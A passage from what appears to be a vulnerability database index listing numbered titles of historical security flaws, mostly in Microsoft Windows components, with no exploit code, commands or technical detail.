Handling Remote Code Execution [62249] Microsoft Windows TCP/IP Stack ESP Over UDP Header MDL Fragmentation Remote Code Execution [62248] Microsoft Windows TCP/IP Stack ICMPv6 Route Information Packet Handling Remote Code Execution [62247] Microsoft Windows TCP/IP Selective Acknowledgment (SACK) Value Handling Remote DoS [62245] Microsoft Windows Shell Handler ShellExecute API Crafted URL Arbitrary Command Execution [62244] Microsoft Windows SMB Client Negotiate Protocol Response Handling Remote Code Execution [62243] Microsoft Windows SMB Client Packet Handling Race Condition Remote Privilege Escalation [62242] Microsoft Windows Paint JPEG Image Decoding Overflow [61854] Microsoft Windows Virtual DOS Machine (VDM) Subsystem #GP Trap Handler (nt!KiTrap0D) Local Privilege Escalation [61676] Microsoft Windows Live Messenger msnmsgr.exe ActiveX (msgsc.14.0.8089.726.dll) ViewProfile Method MSN Messenger Session Remote DoS [61651] Microsoft Windows Embedded OpenType Font Engine LZCOMP Decompressor Font Handling Arbitrary Code Execution [61037] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4312) [61036] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4311) [60858] Microsoft Windows Intel Indeo32 Codec (ir32_32.dll) IV32 FourCC Code Handling Heap Corruption [60857] Microsoft Windows Indeo Codec Unspecified Memory Corruption [60856] Microsoft Windows Intel Indeo41 Codec IV41 Stream Video Decompression Overflow [60855] Microsoft Windows Intel Indeo41 Codec IV41 movi Record Handling Overflow [60836] Microsoft Windows Active Directory Federation Services (ADFS) Request Header Handling Remote Code Execution [60835] Microsoft Windows Active Directory Federation Services (ADFS) Single Sign-on Spoofing [60833] Microsoft Windows Internet Authentication Service Crafted MS-CHAP v2 Message Remote Authentication Bypass [60832] Microsoft Windows Internet Authentication Service Protected Extensible Authentication Protocol (PEAP) Message Handling Remote Memory Corruption [60831] Microsoft Windows Local Security Authority Subsystem (LSASS) ISAKMP Message Handling Resource Exhaustion Remote DoS [60368] Microsoft Windows Terminal Services msgina.dll Unrestricted Resource Lock Remote DoS [60329] Microsoft Windows 2000 NetBIOS Continuation Packet Remote DoS [60273] Microsoft Windows NT Virtual DOS Machine 16-bit Executable Permission Bypass Local Privilege Escalation [60225] Microsoft Windows XP System Restore Directory ACL Weakness Local Privilege Escalation [60210] Microsoft Windows Active Directory Malformed LDAP Client Request Remote DoS [60206] Microsoft Windows Fast User Switching (FUS) Arbitrary User Process Listing Disclosure [60145] Microsoft Windows NT cmd.exe CD Command Arbitrary Local Code Execution [60057] Microsoft Windows File Protection (WFP) Catalog File (.CAT) Modification Hash Code Comparison Bypass [59957] Microsoft Windows SMB Response Handling Remote DoS [59886] Microsoft Exchange Malformed Microsoft Remote Procedure Call (MSRPC) Remote DoS [59869] Microsoft Windows Win32k Table of Directory Entry Building Font Code Parsing Remote Code Execution [59868] Microsoft Windows Win32k GDI Kernel Component Unspecified Local Privilege Escalation [59867] Microsoft Windows Win32k Unspecified Kernel System Call Local Privilege Escalation [59865] Microsoft Windows Web Services on Devices API (WSDAPI) Message Header Handling Memory Corruption [59856] Microsoft Windows Active Directory Malformed LDAP Request Stack Exhaustion Remote DoS [59738] Microsoft Windows ZIP Filename Handling Overflow DoS [59736] Microsoft Windows Media Player (WMP) on Solaris Installation Permission Weakness Local Privilege Escalation [59734] Microsoft Windows Log Clearning Function Admin Notification Weakness [59733] Microsoft Windows 2000 Terminal Services Screensaver Screen Minimization Locking Weakness [59732] Microsoft Windows Screensaver Domain Account Lock Verification Local Brute Force Weakness [59731] Microsoft Windows 2000 DCOM Client Alter Context Request Remote Information Disclosure [59730] Microsoft Windows 2000 Terminal Services Disconnect Feature Local Privilege Escalation [59515] Microsoft Windows csrss.exe Command Prompt Input Manipulation Forced Reboot DoS [59514] Microsoft Windows 2000 Task Manager Uppercase Process Name Termination Weakness [59513] Microsoft Windows NT winnt/system32 Write Access Local DoS (NT4ALL) [59509] Microsoft Windows 2000 Encrypted File System Cleartext Backup File Local Disclosure [59347] Microsoft Windows SYSKEY Registry EFS Startup Key Disclosure [59346] Microsoft Windows 2000 Crafted TCP/UDP Traffic CPU Consumption Remote DoS [59340] Microsoft Windows NT Logon Box Account Name Disclosure [59333] Microsoft Windows NT Winlogon Key Local Shutdown DoS [59325] Microsoft Windows NT Scheduler Drive Mapping Permission Weakness Local Privilege Escalation [59264] Microsoft Windows Crafted Fragmented Packet Stream Remote DoS (Jolt) [59260] Microsoft Windows NT SNMP Agent Query Saturation Remote DoS [59250] Microsoft Windows NT Fragmented Packet Handling Remote DoS (ntfrag) [59241] Microsoft Windows CreateRemoteThread Function Arbitrary Writeable Process Termination DoS [58876] Microsoft Windows SMB Packet Command Value Handling Remote Code Execution [58875] Microsoft Windows SMBv2 Packet Handling Infinitie Loop Remote DoS [58862] Microsoft Windows LSASS Malformed NTLM Authentication Packets Remote Overflow DoS [58861] Microsoft Windows Kernel Exception Handler Unspecified Local DoS [58860] Microsoft Windows Kernel User Mode PE File Handling NULL Dereference Local Privilege Escalation [58859] Microsoft Windows Kernel 64-bit Value Conversion Truncation Local Privilege Escalation [58856] Microsoft Windows CryptoAPI X.509 Certificate Object Identifier Handling Overflow Spoofing Weakness [58855] Microsoft Windows CryptoAPI X.509 Certificate Common Name Null Truncation Spoofing [58854] Microsoft Windows Indexing Service ActiveX Memory Corruption Arbitrary Code Execution [58845] Microsoft Windows Media Runtime Compressed Audio File Handling Heap Corruption Arbitrary Code Execution [58844] Microsoft Windows Media Player ASF Runtime Voice Sample Rate Handling Arbitrary Code Execution [58843] Microsoft Windows Media Player ASF Handling Overflow [58786] Microsoft Windows User Profile Unloading Session Persistence Weakness [58785] Microsoft Windows MFC Component (MFC42u.dll) AfxOleSetEditMenu Function RTF Malformed OLE Object Handling Overflow [58656] Trend Micro ServerProtect for Windows EarthAgent.exe Multiple RPC Functions Remote Overflow [57806] Microsoft Windows Wireless LAN AutoConfig Service (wlansvc) Frame Parsing Arbitrary Code Execution [57803] Microsoft Windows Media MP3 File Handling Memory Corruption [57802] Microsoft Windows Media ASF Header Parsing Invalid Free Arbitrary Code Execution [57799] Microsoft Windows srv2.sys Kernel Driver SMB2 Malformed NEGOTIATE PROTOCOL REQUEST Remote DoS [57798] Microsoft Windows DHTML Editing Component ActiveX Arbitrary Code Execution [57797] Microsoft Windows TCP/IP Orphaned Connection Handling Remote DoS [57796] Microsoft Windows TCP/IP Packet State Information Handling Remote Code Execution [57795] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [57016] Microsoft Windows win32k.sys Embedded OpenType Font Handling DoS [56912] Microsoft Windows Terminal Services Client ActiveX Unspecified Overflow [56909] Microsoft Windows AVI Media File Parsing Unspecified Overflow [56908] Microsoft Windows Malformed AVI Header Parsing Arbitrary Code Execution [56904] Microsoft Windows Telnet NTLM Credential Reflection Remote Access [56902] Microsoft Windows Workstation Service NetrGetJoinInformation Function Local Memory Corruption Arbitrary Code Execution [56901] Microsoft Windows Message Queuing Service (MSMQ) mqac.sys IOCTL Request Parsing Local Privilege Escalation [56900] Microsoft Windows Internet Name Service (WINS) Network Packet Handling Remote Integer Overflow [56899] Microsoft Windows Internet Name Service (WINS) Push Request Handling Remote Overflow [56780] Microsoft Windows win32k.sys NtUserConsoleControl Function Memory Manipulation Local Privilege Escalation [56516] Microsoft Windows lpCmdLine Filename Whitespace Handling Weakness [56514] Microsoft Windows gzip Libraries Unspecified Remote Code Execution [56513] Microsoft Windows Autorun / NoDriveTypeAutoRun Registry Value Enforcement Weakness [55843] Microsoft Windows Embedded OpenType (EOT) Font Name Tables Parsing Overflow [55842] Microsoft Windows Embedded OpenType (EOT) Font Data Record Parsing Overflow [55645] Microsoft Windows Live Messenger (WLM) msnmsgr.exe Malformed Content-Type Header Remote DoS [55644] Microsoft Windows Live Messenger Client MSN Protocol over NAT Multiple Header Field Internal IP Disclosure [55332] Microsoft Windows PPTP Server (Raspptpe.sys) Malformed Control Packet Remote DoS [55309] Microsoft Windows ICMP Type 9 Packet Remote DoS [55227] CA ARCserve Backup for Windows Message Engine 0x3B Message Invalid Stub Data RPC Marshalling Error Remote DoS [55050] Microsoft Windows win32k.sys Thread Handling Local Race Condition DoS [54961] Microsoft Office PowerPoint Freelance Windows Translator (FL21WIN.DLL) Layout Parsing Overflow [54943] Microsoft Windows Kernel Desktop Parameter Manipulation Local Privilege Escalation [54942] Microsoft Windows Kernel Driver Class Registration Local Privilege Escalation [54941] Microsoft Windows Kernel User Mode Pointer Passing Local Privilege Escalation [54940] Microsoft Windows Kernel Desktop Object Manipulation Local Privilege Escalation [54939] Microsoft Office Works for Windows File Converter .wps Handling Overflow [54938] Microsoft Windows Active Directory Crafted LDAP(S) Request Handling Remote DoS [54937] Microsoft Windows Active Directory Crafted LDAP(S) Request Hexdecimal DN AttributeValue Handling Arbitrary Code Execution [54935] Microsoft Windows MSHTML Search Preview Display Information Disclosure [54933] Microsoft Windows Print Spooler Crafted Separator Page Arbitrary Local File Disclosure [54932] Microsoft Windows Print Spooler win32spl.dll EnumeratePrintShares Function Remote Overflow [54931] Microsoft Windows SystemParametersInfo() Function SPI_*DESKWALLPAPER Call Local DoS [54191] Microsoft Windows GDI+ PNG File Handling Infinite Loop DoS [53804] Microsoft Windows Media Player MID File Handling Overflow DoS [53668] Microsoft Windows ThreadPool ACL Enforcement Weakness Local Privilege Escalation [53666] Microsoft Windows Management Instrumentation (WMI) Service Isolation Local Privilege Escalation [53623] Microsoft Windows SearchPath File Open / Locating Unspecified Arbitrary Code Execution [53621] Microsoft Windows HTTP Services Digital Certificate Distinguished Name Mismatch Weakness [53620] Microsoft Windows HTTP Services Web Server Response Unspecified Integer Underflow [53619] Microsoft Windows HTTP Services NTLM Credential Replay Privileged Code Execution [53533] Microsoft Windows Task Manager (taskmgr.exe) I/O Activity Local Information Disclosure [53309] Microsoft Windows WINS 1Ch Registration Domain Controller Manipulation [53248] Microsoft Windows DNS Server Crafted Packets Remote Memory Consumption DoS [52892] Microsoft IE on Windows Link Click Unspecified Arbitrary Code Execution (PWN2OWN) [52694] Microsoft Windows Media Player Malformed GET Request DoS [52693] Microsoft Windows Mobile Bluetooth Stack OBEX FTP Service Traversal Arbitrary File Manipulation [52685] Microsoft Windows FTP Client Multiple Command Overflows [52683] Microsoft Windows explorer.exe Malformed PNG Handling DoS [52682] Microsoft Windows Explorer ZIP Handler DoS [52681] Microsoft Windows Firewall sessmgr.exe Port Restriction Local Bypass [52524] Microsoft Windows Invalid Pointer Local Privilege Escalation [52523] Microsoft Windows Handle Validation Local Privilege Escalation [52522] Microsoft Windows GDI Kernel Component Unspecified Remote Code Execution [52521] Microsoft Windows SChannel Certificate Based Authentication Spoofing Bypass [52520] Microsoft Windows WPAD WINS Server Registration Web Proxy MiTM Weakness [52519] Microsoft Windows DNS Server WPAD Registration Dynamic Update MiTM Weakness [52518] Microsoft Windows DNS Server Response Response Validation Transaction ID Prediction Weakness [52517] Microsoft Windows DNS Server Query Validation Spoofing [51433] Microsoft Windows Crafted CHM File Handling Overflow [51133] Microsoft Windows Media Player Multiple File Handling Remote Overflow [50567] Microsoft Windows WordPad Text Converter Unspecified Memory Corruption [50566] Microsoft Windows Explorer search-ms Protocol Handler Arbitrary Code Execution [50565] Microsoft Windows Explorer Saved Search File Handling Arbitrary Code Execution [50562] Microsoft Windows GDI WMF Image Size Parameter Parsing Overflow [50561] Microsoft Windows GDI WMF Image Parsing Integer Math Overflow [50559] Microsoft Windows Media Component Crafted ISATAP Address NTLM Credential Disclosure [50558] Microsoft Windows Media Component Service Principal Name (SPN) Credential Reflection Arbitrary Code Execution [50533] Microsoft Windows Media Services nskey.dll ActiveX CallHTMLHelp Method Overflow [50287] Microsoft Windows Vista iphlpapi.dll CreateIpForwardEntry2() Function Memory Corruption [50280] Microsoft Windows UnhookWindowsHookEx Call Saturation Race Condition Local DoS [50252] Microsoft Windows Media Player Crafted DAT File MThd Header Handling DoS [50251] Microsoft Windows Media Player Crafted MIDI File MThd Header Handling DoS [50000] Microsoft Windows Active Directory LDAP Server Bind Request User Account Enumeration [49897] Microsoft Windows Explorer Crafted ZIP File Handling DoS [49895] Microsoft Windows GDI+ gdiplus.dll Crafted ICO File Handling DoS [49736] Microsoft Windows SMB NTLM Authentication Credential Replay Remote Code Execution [49364] Cisco PIX / ASA Microsoft Windows NT VPN Domain Authentication Bypass [49068] Microsoft Host Integration Server (HIS) SNA RPC Request Remote Overflow [49061] Microsoft Windows Ancillary Function Driver (afd.sys) Local Privilege Escalation [49058] Microsoft Windows Active Directory LDAP(S) Request Handling Remote Overflow [49057] Microsoft Windows SMB File Name Handling Remote Underflow [49056] Microsoft Windows Kernel Memory Corruption Local Privilege Escalation [49055] Microsoft Windows Kernel New Window Creation Process Arbitrary Code Execution [49054] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [49053] Microsoft Windows Virtual Address Descriptors (VAD) Local Privilege Escalation [48837] Microsoft Windows Vista Page Fault Handling DoS [48789] Microsoft Windows Mobile Bluetooth Device Name Overflow DoS [48359] Microsoft Windows Vista ASLR / DEP Memory Protection Bypass [48302] Microsoft Windows nslookup.exe DNS Zone Transfer Request Unspecified Arbitrary Code Execution [48153] Microsoft Windows srv.sys WRITE_ANDX SMB Packet Handling Remote DoS [48037] Microsoft Windows Image Acquisition Logger ActiveX Open Method Arbitrary File Download [48009] Microsoft Windows Kernel IopfCompleteRequest API Overflow [47963] Microsoft Windows Media Player Audio File Sampling Rate Remote Code Execution [47962] Microsoft Windows Media Encoder wmex.dll ActiveX Overflow [47412] Microsoft Windows Event System Crafted Request Array Index Handling Remote Privilege Escalation [47411] Microsoft Windows Event System Per-user Subscription Crafted Request Remote Privilege Escalation [47403] Microsoft Windows Messenger ActiveX (Messenger.UIAutomation.1) Remote Privileged Operations [47396] Microsoft Windows IPsec Policy Import Failure Cleartext Remote Information Disclosure [47395] Microsoft Windows Image Color Management System (MSCMS) mscms.dll InternalOpenColorProfile Function ICM Image File Handling Overflow [46990] Microsoft Windows Explorer (explorer.exe) Unspecified WMF Handling DoS [46801] Microsoft Windows Calendar Malformed ICS File Handling DoS [46778] Microsoft Windows DNS Query ID Field Prediction Cache Poisoning [46777] Microsoft Windows DNS Socket Entropy Weakness Cache Poisoning [46774] Microsoft Windows Explorer Saved Search File Handling DoS [46210] Microsoft Windows Installer msiexec.exe /uninstall Option GUID Value Overflow [46068] Microsoft Windows Pragmatic General Multicast (PGM) Fragment Handling Remote DoS [46067] Microsoft Windows Pragmatic General Multicast (PGM) Packet Handling Remote DoS [46066] Microsoft Windows Active Directory LDAP Request Processing Remote DoS [46063] Microsoft Windows Internet Name Service (WINS) Packet Handling Local Privilege Escalation [46062] Microsoft Windows Speech Components (sapi.dll) Speech Recognition Code Execution [46061] Microsoft Windows Bluetooth SDP Packet Processing Remote Code Execution [45809] Microsoft Windows Vista Kernel Unspecified Remote Issue [45523] Microsoft Windows Live Messenger GDI Engine Malformed File Handling Overflow [45521] Microsoft Windows Explorer (explorer.exe) Malformed PNG Handling Remote DoS [45280] Microsoft Windows Media Player (WMP) mplay32.exe MP3 Filename Handling Local Overflow [45048] Microsoft Windows XP I2O Utility Filter Driver (i2omgmt.sys) Local Privilege Escalation [44975] Microsoft Windows CE GIF Imaging Component Unspecified Arbitrary Code Execution [44974] Microsoft Windows CE JPEG (GDI+) Handling Unspecified Arbitrary Code Execution [44880] Microsoft Windows msjet40.dll MDB File Handling Overflow [44580] Microsoft Windows Microsoft Distributed Transaction Coordinator (MSDTC) SeImpersonatePrivilege User Right Local Privilege Escalation [44318] Trend Micro ServerProtect for Windows (SpntSvc.exe) StRpcSrv.dll Arbitrary Remote Code Execution [44215] Microsoft Windows GDI EMF Filename Parameter Handling Overflow [44214] Microsoft Windows GDI WMF Handling CreateDIBPatternBrushPt Function Overflow [44213] Microsoft Windows GDI (gdi32.dll) EMF File Handling Multiple Overflows [44206] Microsoft Windows Kernel Unspecified Privilege Escalation [44200] Microsoft Windows Random Number Generator (RNG) CryptGenRandom Function Prediction Weakness [44172] Microsoft Windows DNS Client Predictable Transaction ID Spoofing [44171] Microsoft Windows HxTocCtrl ActiveX (hxvz.dll) Memory Corruption [44018] Microsoft Windows Vista SP1 Page Protection Unspecified Bypass [43773] Microsoft Windows Explorer (explorer.exe) GIF File Handling Remote DoS [43715] Microsoft Windows Media Player (WMP) AIFF File Handling DoS [43603] Microsoft Windows DNS Server Dynamic Update Mechanism Client Authentication Bypass [43434] Microsoft Windows Vista NoDriveTypeAutoRun Auto-Play Bypass [43307] Microsoft Windows Explorer (explorer.exe) AVI Handling Right-Click Action DoS [42579] 3ivx MPEG-4 on Microsoft Windows Media Player (WMP) mplayer2.exe MP4 File Handling Overflow [41628] IBM Informix Storage Manager (ISM) Windows RPC Components XDR Library Multiple Unspecified Remote Overflows [41553] Microsoft Windows Explorer BMP Width Dimension Handling Overflow [41491] Microsoft Windows Vista Crafted DHCP Response DoS [41463] Microsoft Windows OLE Automation Unspecified Memory Corruption Remote Code Execution [41156] Microsoft Windows x64 Kernel PatchGuard Bypass [41155] Microsoft Windows Hardware-enforced DEP Bypass [41154] Microsoft Windows XP EFS Cleartext Password Storage [41097] Microsoft Windows Task Scheduler (at.exe) Local Privilege Escalation [41093] Microsoft Windows Media Player (WMP) MSIE Static Invocation HTML Rendering Weakness [41092] Microsoft Windows DNS Service Predictable Transaction ID Weakness [41090] Microsoft Windows w/ IE7 Shell32.dll Crafted URL Third-party Application Arbitrary Command Execution [41065] Microsoft Windows kernel32.dll Multiple Function DoS [41064] Microsoft Windows ntdll.dll Multiple Function DoS [41059] Microsoft Windows ARP Saturation Remote DoS [40071] Microsoft Windows LSASS Crafted LPC Request Local Privilege Escalation [40070] Microsoft Windows TCP/IP IGMPv3 / MLDv2 Packet Handling Remote Code Execution [40069] Microsoft Windows TCP/IP ICMP RDP Packet Handling Remote DoS [39751] Trend Micro ServerProtect for Windows (SpntSvc.exe) StRpcSrv.dll Multiple Function Remote Overflow [39750] Trend Micro ServerProtect for Windows Agent Service RPCFN_CopyAUSrc Function Remote Overflow [39521] Cisco Security Agent for Microsoft Windows Crafted SMB Packet Remote Overflow [39131] Microsoft Windows Media Player Crafted AU File Application Crash Remote DoS [39127] Microsoft Windows DirectX WAV / AVI File Parsing Arbitrary Code Execution [39126] Microsoft Windows DirectX SAMI File Parsing Arbitrary Code Execution [39125] Microsoft Windows Vista SMBv2 Signing Unspecified Remote Code Execution [39124] Microsoft Windows Vista Kernel Legacy Reply Path Validation Local Privilege Escalation [39123] Microsoft Windows Message Queuing MSMQ Message Handling Arbitrary Code Execution [39122] Microsoft Windows Media Format Runtime ASF Parsing Arbitrary Code Execution [39014] Microsoft Windows RunAs Command Local Arbitrary Process DoS [38991] Microsoft Windows PNG Image IHDR block Multiple Crafted Value Remote DoS [38499] Microsoft Windows Mobile ActiveSync USB Weak PIN/Password Encryption [38494] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) ICO Handling DoS [37637] Microsoft Windows Crafted HLP File Overflow [37635] Microsoft Windows Virtual DOS Machine (VDM) PhysicalMemory Race Condition Local Privilege Escalation [37631] Microsoft Windows Malformed NNTP Response Remote Memory Corruption [37627] Microsoft Windows Kodak Image Viewer Image File Handling Arbitrary Code Execution [37105] Microsoft Windows mfc42.dll / mfc42u.dll CFileFind Class FindFile() Function Overflow [36938] Microsoft Windows XP Kernel Process Scheduler Local DoS [36937] Microsoft Windows / IE ActiveX (triedit.dll) Multiple Property NULL Pointer DoS [36935] Microsoft Windows Services for UNIX Local Privilege Escalation [36393] Microsoft Windows Vista Weather Gadgets Crafted HTML Attribute Unspecified Issue [36392] Microsoft Windows Vista Contacts Gadget Crafted Contact Information Arbitrary Code Execution [36391] Microsoft Windows Vista Feed Headlines Gadgets RSS Feed XSS [36390] Microsoft Windows Vector Markup Language (VML) VGX.DLL CDownloadSink Class Overflow [36388] Microsoft Windows Graphics Rendering Engine (GDI) Metafile Image Handling Overflow [36387] Microsoft Windows OLE Automation TextNode Object substringData Method Overflow [36386] Microsoft Windows Media Player Skin File Handling Crafted Header Arbitrary Code Execution [36385] Microsoft Windows Media Player Skin File Handling Overflow [36149] Microsoft IE on Windows Mobile Unspecified Overflow DoS [36148] Microsoft Windows Mobile Pictures and Videos Malformed JPEG DoS [36146] Microsoft Windows Terminal Services TLS Downgrade Weakness [36145] Microsoft Windows Event Viewer (eventvwr.exe) Log Data Exclusion [36144] Microsoft Windows Bluetooth Unspecified Remote Privilege Escalation [36143] Microsoft Windows Mobile Pocket PC Edition Unspecified Remote Privilege Escalation [36141] Microsoft Windows Explorer Ole32.dll Crafted Document Summary Information DoS [36138] Microsoft Windows Active Directory Time Restriction User Enumeration [36111] Symantec Backup Exec for Windows RPC Crafted ncacn_ip_tcp Request Remote Overflow [35962] Microsoft Windows XP Registry QHEADLES Permission Weakness [35961] Microsoft Windows Active Directory LDAP Service Crafted Request Remote DoS [35960] Microsoft Windows Active Directory LDAP Service Convertible Attribute Remote Code Execution [35952] Microsoft Windows Vista Teredo Crafted IPv6 Traffic Blocking Rule Bypass [35637] Microsoft Windows Unspecified Remote Code Execution [35347] Microsoft Windows Schannel Security Package Crafted Digital Signature Arbitrary Code Execution [35346] Microsoft Outlook Express / Windows Mail MHTML Content Disposition Parsing Cross Domain Information Disclosure [35345] Microsoft Outlook Express / Windows Mail URL Parsing Cross Domain Information Disclosure [35344] Microsoft Windows Vista Local User Information Data Stores Information Disclosure [35341] Microsoft Windows Win32 API Unspecified Remote Code Execution [34490] Microsoft Windows Explorer Folder Browsing WMV Handling DoS [34103] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) DNS Subversion [34102] Microsoft Windows Vista Mail Client Crafted Link Arbitrary Program Execution [34101] Microsoft Windows XP winmm.dll mmioRead Function DoS [34099] Microsoft Windows TrueType Fonts Rasterizer Local Privilege Escalation [34098] Microsoft Windows GDI Functions Windows Metafile (WMF) Handling DoS [34097] Microsoft Windows GDI Enhanced Metafile (EMF) Handling Local Privilege Escalation [34096] Microsoft Windows GDI Invalid Window Size Local Privilege Escalation [34095] Microsoft Windows GDI Crafted Image Local Privilege Escalation [34011] Microsoft Windows Kernel Mapped Memory Local Privilege Escalation [34010] Microsoft Windows XP UPnP Remote Memory Corruption [34009] Microsoft Windows Agent URL Parsing Memory Corruption [34008] Microsoft Windows Vista CSRSS Local Privilege Escalation [33668] Microsoft Windows Vista Meeting Space DFSR.exe TCP Connection Persistence [33667] Microsoft Windows Vista Persistent Established Teredo Address [33666] Microsoft Windows Vista Teredo nonce Spoofing [33665] Microsoft Windows Vista Neighbor Discovery Crafted Neighbor Advertisement Redirect [33664] Microsoft Windows Vista Crafted Gratuitous ARP Overwrite DoS [33663] Microsoft Windows Vista LLTD Mapper HELLO Packet Spoofing [33662] Microsoft Windows Vista LLTD Mapper Real Source Field Host Spoofing [33661] Microsoft Windows Vista LLTD Responder Race Condition Host Spoofing [33660] Microsoft Windows Vista LLTD Mapper EMIT Packet Gathering Remote DoS [33635] AMD ATI Radeon for Microsoft Windows Vista atikmdag.sys Kernel Mode Driver DoS [33628] Microsoft Windows NDISTAPI.sys Permission Weakness Local DoS [33474] Microsoft Windows ReadDirectoryChangesW API Function File System Information Disclosure [33307] Microsoft Windows Media MID Malformed Header Chunk DoS [33306] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [33219] Microsoft Windows Live Messenger Gestual Emoticon Saturation CPU Consumption DoS [32629] Microsoft IE on Windows Mobile Malformed WML Page Unspecified DoS [32628] Microsoft Windows / IE ActiveX (mshtml.dll) Multiple Property NULL Pointer DoS [31897] Microsoft Windows CSRSS NtRaiseHardError Function Arbitrary Memory Disclosure [31890] Microsoft Windows Shell New Hardware Local Privilege Escalation [31889] Microsoft Windows XP SP2 Image Aquisition Service Local Privilege Escalation [31885] Microsoft Windows OLE Dialog Memory Corruption Remote Code Execution [31884] Microsoft Windows HTML Help ActiveX Control Arbitrary Code Execution [31659] Microsoft Windows CSRSS MessageBox Function Privilege Escalation [31645] Microsoft Windows DNS Recursive Query DoS [30997] Microsoft Windows .manifest File Handling Local DoS [30871] Microsoft Windows DRM drmstor.dll ActiveX Object StoreLicense Function Memory Corruption [30821] Microsoft Outlook Express Windows Address Book Contact Record Code Execution [30819] Microsoft Windows Media Player ASX Playlist Handling Overflow [30818] Microsoft Windows Media Player ASF Parsing Overflow [30817] Microsoft Windows Remote Installation Service TFTP Arbitrary File Overwrite [30811] Microsoft Windows SNMP Service Remote Overflow [30405] Microsoft Windows Active Directory Unspecified DoS [30263] Microsoft Windows Workstation Service Crafted Message Remote Overflow [30262] Microsoft Windows Agent ACF File Handling Memory Corruption [30261] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote DoS [30260] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote Code Execution [30214] Microsoft Windows GDI Kernel Structure Modification Code Execution [30096] Microsoft Windows NAT Helper Components ipnathlp.dll with ICS Malformed DNS Query DoS [29529] Microsoft Windows 2000 creator.dll ActiveX COM Object Memory Corruption [29528] Microsoft Windows 2000 msdxm.ocx ActiveX COM Object Memory Corruption [29527] Microsoft Windows 2000 myinfo.dll ActiveX COM Object Memory Corruption [29526] Microsoft Windows 2000 ciodm.dll ActiveX COM Object Memory Corruption [29439] Microsoft Windows Server Service Crafted SMB Packet Unspecified Issue [29424] Microsoft Windows Object Packager File Extension Dialog Spoofing [29409] Microsoft Windows TCP 135 Crafted Packet Saturation DoS [29351] Microsoft Windows Terminal Services tsuserex.dll COM Object Instantiation [29231] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Arbitrary Code Execution [29128] Microsoft Windows gdiplus.dll Divide-by-zero DoS [28731] Microsoft Windows Pragmatic General Multicast (PGM) Multicast Message Arbitrary Code Execution [28729] Microsoft Windows Indexing Service Unspecified XSS [28372] Microsoft Windows Explorer URL Passing Recursive file Tag Local DoS [28208] Microsoft Windows Live Messenger Contact List .ctt File Heap Overflow [27848] Microsoft Windows Kernel Unspecified Local Privilege Escalation [27847] Microsoft Windows Unhandled Exception Unspecified Remote Code Execution [27846] Microsoft Windows Winlogon Search Path Subversion Local Privilege Escalation [27844] Microsoft Windows DNS Client Service Record Response Overflow [27843] Microsoft Windows Winsock API Hostname Remote Code Execution [27797] Microsoft Windows GDI library (gdi32.dll) createBrushIndirect Function WMF Parsing DoS [27644] Microsoft Windows Server Driver (srv.sys) Crafted SMB Packet NULL Dereference DoS [27155] Microsoft Windows Server Service SRV.SYS Crafted Request SMB Information Disclosure [27154] Microsoft Windows Server Service SRV.SYS First-class Mailslot Message Remote Overflow [27152] Microsoft Windows IIS ASP Page Processing Overflow [27151] Microsoft Windows DHCP Client Service Crafted Response Overflow [26440] Microsoft Windows SMB MrxSmbCscIoctlOpenForCopyChunk Function Overflow [26439] Microsoft Windows SMB MRXSMB.SYS MrxSmbCscIoctlCloseForCopyChunk Remote DoS [26437] Microsoft Windows RRAS RASMAN Remote Overflow [26433] Microsoft Windows TCP/IP Protocol Driver Source Routing Overflow [26432] Microsoft Windows jgdw400.dll ART Image Rendering Overflow [26431] Microsoft Windows Graphics Rendering Engine PolyPolygon Function Overflow [26430] Microsoft Windows Media Player PNG Processing Overflow [25949] Microsoft Windows INETCOMM.DLL mhtml: URI Overflow [25761] Microsoft Windows NTDLL.DLL RtlDosPathNameToNtPathName_U API Path Conversion Weakness [25501] Microsoft Windows itss.dll CHM Processing Overflow [25429] Novell Client for Windows DPRPC library (DPRPCW32.DLL) ndps_xdr_array Function Remote Overflow [25336] Microsoft Windows Distributed Transaction Coordinator (DTC) BuildContextW Request DoS [24802] Microsoft Windows Help winhlp32.exe Embedded Image Processing Overflow [24519] Microsoft Outlook Express Windows Address Book (.wab) Processing Overflow [24516] Microsoft Windows Explorer COM Object Handling Remote Code Execution [23136] Microsoft Windows/Office Korean Input Method Editor (IME) ShellAbout() Privilege Escalation [23134] Microsoft Windows Web Client Service Crafted WebDAV Request Overflow [23133] Microsoft Windows IGMPv3 Crafted Packet Remote DoS [23132] Microsoft Windows Media Player Plug-in Malformed EMBED Element Arbitrary Code Execution [23131] Microsoft Windows Media Player Bitmap File Processing Overflow [23047] Microsoft Windows SSDP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23046] Microsoft Windows SCardSvr SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23045] Microsoft Windows NetBT SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23044] Microsoft Windows UPnP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [22710] Microsoft Windows Ad-hoc Network Advertisement Weakness [22697] Microsoft Windows Unspecified Display Driver Large Image Processing DoS [22396] Microsoft Windows WMF Processing ExtEscape POSTSCRIPT_INJECTION Function Overflow DoS [22371] Microsoft Windows WMF Processing ExtCreateRegion Function Overflow DoS [21987] Microsoft Windows Shimgvw.dll SETABORTPROC Function Crafted WMF Arbitrary Code Execution [21598] Microsoft Windows 2000 NetBIOS Port Malformed TCP Packet Parsing Remote DoS [21536] Microsoft Windows backup File Name Extension Overflow [21510] Microsoft Windows SynAttackProtect Bypass [20916] Microsoft Windows UPnP GetDeviceList Remote DoS [20875] Microsoft Windows XP Professional Upgrade MSIE Rollback [20580] Microsoft Windows GetEnhMetaFilePaletteEntries() EMF File Rendering DoS [20579] Microsoft Windows GDI Metafile SetPalette Entries Overflow [20497] Microsoft Windows 98SE User32.dll Icon DoS [20367] Microsoft Windows XP Fast User Switching Arbitrary Account Lockout [20366] Microsoft Windows XP Remote Desktop Client Cleartext Account Name Transmission [20364] Microsoft Windows keybd_event Validation Privilege Escalation [20356] Microsoft Windows Win32k.sys ShowWindow Function Local DoS [20279] 